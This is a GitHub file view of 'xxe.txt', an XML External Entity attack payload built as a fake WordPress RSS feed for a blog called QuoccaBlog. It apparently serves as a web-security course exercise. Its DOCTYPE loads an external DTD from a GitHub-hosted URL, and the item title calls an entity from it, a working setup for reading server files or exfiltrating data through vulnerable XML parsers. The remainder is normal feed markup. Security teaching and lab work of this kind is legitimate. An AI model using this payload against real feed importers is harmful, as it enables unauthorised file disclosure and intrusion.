-
Notifications
You must be signed in to change notification settings - Fork 0
/
xxe.txt
48 lines (44 loc) · 1.75 KB
/
xxe.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY % xxe SYSTEM "https://raw.githubusercontent.com/dsvid/COMP6843_xxe_tests/master/v2_external.txt">
%xxe;
]>
<rss version="2.0"
xmlns:content="http://purl.org/rss/1.0/modules/content/"
xmlns:wfw="http://wellformedweb.org/CommentAPI/"
xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:atom="http://www.w3.org/2005/Atom"
xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
>
<channel>
<title>QuoccaBlog</title>
<atom:link href="https://blog.quoccabank.com/?feed=rss2" rel="self" type="application/rss+xml" />
<link>https://blog.quoccabank.com</link>
<description>The blogging home of QuoccaBank</description>
<lastBuildDate>Mon, 08 Jun 2020 12:43:08 +0000</lastBuildDate>
<language>en-US</language>
<sy:updatePeriod>
hourly </sy:updatePeriod>
<sy:updateFrequency>
1 </sy:updateFrequency>
<generator>https://wordpress.org/?v=5.7.2</generator>
<item>
<title>&external;</title>
<link>https://blog.quoccabank.com/?p=42</link>
<comments>https://blog.quoccabank.com/?p=42#respond</comments>
<dc:creator><![CDATA[admin]]></dc:creator>
<pubDate>Mon, 08 Jun 2020 12:31:03 +0000</pubDate>
<category><![CDATA[Humans of QuoccaBank]]></category>
<category><![CDATA[Uncategorized]]></category>
<guid isPermaLink="false">https://blog.quoccabank.com/?p=42</guid>
<description><![CDATA[Scott’s favourite animal are the sharks.]]></description>
<content:encoded><![CDATA[
<p>Scott’s favourite animal are the sharks.</p>
]]></content:encoded>
<wfw:commentRss>https://blog.quoccabank.com/?feed=rss2&p=42</wfw:commentRss>
<slash:comments>0</slash:comments>
</item>
</channel>
</rss>